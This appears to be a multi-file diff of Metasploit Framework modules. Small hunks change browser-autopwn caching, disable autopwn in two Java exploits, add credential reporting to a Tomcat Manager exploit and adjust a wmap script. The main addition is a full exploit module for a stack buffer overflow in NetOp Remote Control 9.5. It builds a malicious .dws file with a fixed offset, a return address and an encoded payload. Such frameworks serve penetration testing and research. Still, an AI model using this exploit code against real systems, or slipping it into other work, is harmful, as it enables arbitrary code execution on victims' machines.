@@ -943,6 +971,13 @@ class Metasploit3 < Msf::Auxiliary
 		@targetcache[key][:ua_string] = request['User-Agent']
 		@targetcache[key][:ua_name] = ua_name
 		@targetcache[key][:ua_ver] = ua_ver
+
+		@targetcache[key][:host] = {}
+		@targetcache[key][:host][:os_name] = os_name
+		@targetcache[key][:host][:os_flavor] = os_flavor
+		@targetcache[key][:host][:os_sp] = os_sp
+		@targetcache[key][:host][:os_lang] = os_lang
+
 	end

 	# Override super#get_client to use a cache since the database is generally
@@ -18,8 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::EXE

-	include Msf::Exploit::Remote::BrowserAutopwn
-	autopwn_info({ :javascript => false })
+	# Superceded by java_atomicreferencearray
+	#include Msf::Exploit::Remote::BrowserAutopwn
+	#autopwn_info({ :javascript => false })

 	def initialize( info = {} )

@@ -17,8 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote

 	include Msf::Exploit::Remote::HttpServer::HTML

-	include Msf::Exploit::Remote::BrowserAutopwn
-	autopwn_info({ :javascript => false })
+	# Superceded by java_atomicreferencearray
+	#include Msf::Exploit::Remote::BrowserAutopwn
+	#autopwn_info({ :javascript => false })

 	def initialize( info = {} )

@@ -128,6 +128,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			return CheckCode::Unknown
 		end

+		report_auth_info(
+			:host   => rhost,
+			:port   => rport,
+			:sname  => (ssl ? "https" : "http"),
+			:user   => user,
+			:pass   => pass,
+			:proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
+			:active => true
+		)
+
 		print_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}")
 		return CheckCode::Vulnerable
 	end
@@ -212,6 +222,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
 		end

+                report_auth_info(
+                        :host   => rhost,
+                        :port   => rport,
+                        :sname  => (ssl ? "https" : "http"),
+                        :user   => user,
+                        :pass   => pass,
+                        :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
+                        :active => true
+                )
+
 		#
 		# EXECUTE
 		#
@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'NetOp Remote Control Client 9.5 Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
+				When opening a .dws file containing a specially crafted string longer then 520
+				characters will allow an attacker to execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Ruben Alejandro "chap0"',
+				],
+			'References'     =>
+				[
+					[ 'OSVDB', '72291' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'process',
+					'DisablePayloadHandler' => 'true'
+				},
+			'Platform'       => 'win',
+			'Payload'        =>
+				{
+					'Space' => 2000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => true,
+					'StackAdjustment' => -3500
+				},
+			'Targets'        =>
+				[
+					[ 'Windows XP SP3',
+						{
+							'Ret' => 0x20d6c32c,  # push esp #  ret  - nrp.DLL
+							'Offset' => 524
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Apr 28 2011',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),
+			], self.class)
+
+	end
+
+	def exploit
+		buffer =  rand_text(target['Offset'])
+		buffer << [target.ret].pack('V')
+		buffer << make_nops(30)
+		buffer << payload.encoded
+
+		file_create(buffer)
+	end
+
+end
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Post
 			print_good("Successfully migrated to process #{target_pid}")
 		rescue ::Exception => e
 			print_error("Could not migrate in to process.")
-			print_error(e)
+			print_error("Exception: #{e.class} : #{e}")
 		end

 		if datastore['KILL']
@@ -66,6 +66,9 @@ framework.db.hosts.each do |host|
 		print_line("site which will get analyzed:")
 		run_single("wmap_sites -s #{host.address}:#{serv.port}")
 		run_single("wmap_targets -t #{host.address}:#{serv.port}")
+		serv.web_sites.each do |site|
+			run_single("wmap_targets -t #{site.vhost},#{host.address}:#{serv.port}")
+		end
 		print_line("defined target:")
 		run_single("wmap_targets -l")
 		if(profile != nil)